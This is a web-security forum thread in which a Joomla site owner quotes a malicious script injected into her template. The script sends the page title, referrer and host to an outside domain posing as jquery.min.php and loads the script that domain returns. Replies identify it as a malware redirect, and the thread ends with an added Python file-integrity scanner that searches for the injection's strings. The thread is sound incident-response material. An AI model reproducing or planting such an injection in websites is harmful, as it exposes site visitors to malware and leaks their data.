
http://mdiessner.com/js/jquery.min.php Fake jquery


3 replies to this topic

#1 Olgabra


Posted 19 January 2016 - 05:42 PM

Just noticed that my website based on Joomla was hacked. In index.php of my template I noticed this script:

<script>
var a='';
setTimeout(10);
var default_keyword = encodeURIComponent(document.title);
var se_referrer = encodeURIComponent(document.referrer);
var host = encodeURIComponent(window.location.host);
var base = "http://mdiessner.com/js/jquery.min.php";
var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host;
var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url);
if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){
    document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');
}
</script>

As I see, the script is sending some data to or taking some data from http://mdiessner.com/js/jquery.min.php. Could you explain what this script is doing and what else I have to do with my website to eliminate the security flaw?

I already updated Joomla to the latest version. As far as I know, it is not possible to take the root password from the database. I already changed the SQL database password.





#2 shelf life


Posted 23 January 2016 - 09:40 AM

Redirection to a malicious site to possibly install malware.

 

http://www.securitynewspaper.com/2015/11/06/jquery-min-php-malware-affects-thousands-of-websites/


How Can I Reduce My Risk to Malware?


#3 Olgabra


Posted 23 January 2016 - 10:47 PM

> Redirection to a malicious site to possibly install malware.
>
> http://www.securitynewspaper.com/2015/11/06/jquery-min-php-malware-affects-thousands-of-websites/

Thank you very much! I think I deleted it, but I do not know where exactly the backdoor is. I mean, it is the second time the virus has appeared... Is there a way to install a logger to see what kind of files were modified?


Edited by Olgabra, 23 January 2016 - 10:49 PM.


#4 shelf life


Posted 24 January 2016 - 10:58 AM

You're welcome. Have you checked the Joomla site for information? The hack seems to be widespread and well documented. They would be the best source for solutions and prevention.

 

https://docs.joomla.org/Security_Checklist/You_have_been_hacked_or_defaced

 


How Can I Reduce My Risk to Malware?
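
Post #3 asks how to see which files were modified. One way to do that, as an added example that is not part of the original thread: take a SHA-256 baseline of the web root while it is known clean, compare later snapshots against it, and flag files that contain strings from the script quoted in post #1. The function names, the marker list and the scanned extensions are assumptions chosen for this example.

```python
import hashlib
import os

# Strings taken from the injected script quoted in post #1 of this thread.
MARKERS = (b"/js/jquery.min.php", b"c_utt=snt2014")
# File types scanned for the markers (assumption for this example).
SCAN_EXT = (".php", ".js", ".html", ".htm")


def _files(root):
    """Yield (relative_path, absolute_path) for every regular file under root."""
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            if os.path.isfile(full) and not os.path.islink(full):
                yield os.path.relpath(full, root).replace(os.sep, "/"), full


def snapshot(root):
    """Return {relative_path: sha256_hex} for every file in the tree."""
    result = {}
    for rel, full in _files(root):
        digest = hashlib.sha256()
        with open(full, "rb") as fh:
            for chunk in iter(lambda: fh.read(65536), b""):
                digest.update(chunk)
        result[rel] = digest.hexdigest()
    return result


def compare(baseline, current):
    """Return sorted lists of added, modified and removed relative paths."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline.keys() & current.keys()
                      if baseline[p] != current[p])
    return {"added": added, "modified": modified, "removed": removed}


def find_injected(root):
    """Return {relative_path: [markers found]} for files with scanned extensions."""
    hits = {}
    for rel, full in _files(root):
        if rel.lower().endswith(SCAN_EXT):
            with open(full, "rb") as fh:
                data = fh.read()
            found = [m.decode() for m in MARKERS if m in data]
            if found:
                hits[rel] = found
    return hits
```

Keep the saved baseline somewhere the web server account cannot write, so that whoever modifies the site files cannot also rewrite the baseline.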




